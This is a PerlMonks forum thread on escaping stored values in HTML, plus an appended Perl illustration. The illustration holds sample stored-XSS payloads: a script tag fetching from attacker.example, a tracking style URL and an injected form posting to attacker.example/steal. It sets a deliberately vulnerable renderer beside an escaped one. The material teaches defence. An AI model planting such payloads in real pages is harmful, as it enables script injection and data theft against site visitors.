in reply to Re: Interpolation of variables in stored HTML
in thread Interpolation of variables in stored HTML

Thank you My Mother.

Are you talking about someone putting a malicious URL in the firstname field, for example?
Are you able to give me an example of a malicious URL which could do such damage, please?
I'm using placeholders for storing the CGI parms into the database.

Thanks again.

Re^3: Interpolation of variables in stored HTML
by Your Mother (Archbishop) on Nov 04, 2016 at 12:21 UTC

    Anonymous Monk is right. If a hacker can put anything at all into your webpage they can insert JavaScript, a tag with a style attribute that imports a tracking URL to monitor other users who view the info in the future, or this one if the data goes to the DB: Exploits of a Mom.

Re^3: Interpolation of variables in stored HTML
by Anonymous Monk on Nov 04, 2016 at 08:51 UTC

    If you don't escape/encode/filter the values you get from the database, then the resulting HTML can be anything, it can be <form action=http... .... javascript ... so submit doesn't post the data you want, to the url you want .... who's writing the page, the author/programmer or an internet stranger?

    Also no ReadParse, no CGI->Vars; they corrupt data.
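
Added illustration (not from either monk's reply) of the point both Re^3 posts make: placeholders protect the database from the stored value, but nothing protects the HTML unless the value is encoded on the way out. The three `firstname` payloads below are constructed for this example, the `attacker.example` host is fictitious, and `render_raw`/`render_escaped`/`render_input` are hypothetical helpers standing in for whatever the original script does when it interpolates rows into the page. Encoding uses HTML::Entities, which is not part of the original post.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use HTML::Entities qw(encode_entities);

# Constructed examples of what an "internet stranger" could have stored in the
# firstname column through the form. Placeholders kept these out of the SQL,
# but the column now holds markup, not a name.
my @stored_firstnames = (
    # runs in the browser of everyone who later views the record
    q{<script src="https://attacker.example/t.js"></script>},
    # a style attribute whose URL is fetched on every view: a tracking beacon
    q{<span style="background:url(https://attacker.example/p.gif)">Bob</span>},
    # closes the current cell and opens a form, so a later submit posts elsewhere
    q{</td><form action="https://attacker.example/steal">},
);

# Vulnerable: the value from the database is interpolated straight into HTML.
sub render_raw {
    my ($firstname) = @_;
    return qq{<td>$firstname</td>};
}

# Fixed: encode_entities turns < > & " ' into character references, so the
# stored value renders as literal text and can never become markup.
sub render_escaped {
    my ($firstname) = @_;
    return '<td>' . encode_entities($firstname) . '</td>';
}

# Attribute context: the same encoding is safe inside a double-quoted attribute
# because the quotes are encoded as well. It would NOT be enough inside an
# unquoted attribute, a URL, or a <script> block; encoding is context-specific.
sub render_input {
    my ($firstname) = @_;
    return '<input name="firstname" value="' . encode_entities($firstname) . '">';
}

for my $name (@stored_firstnames) {
    print "raw:     ", render_raw($name),     "\n";
    print "escaped: ", render_escaped($name), "\n";
    print "input:   ", render_input($name),   "\n\n";
}
```

Running it shows the raw rendering emitting live `<script>`, `<span style=...>` and `<form>` tags, while the escaped rendering prints `&lt;script src=&quot;https://attacker.example/t.js&quot;&gt;...` as harmless text. The rule is to encode at the point where a database value enters HTML, not at the point where it enters the database.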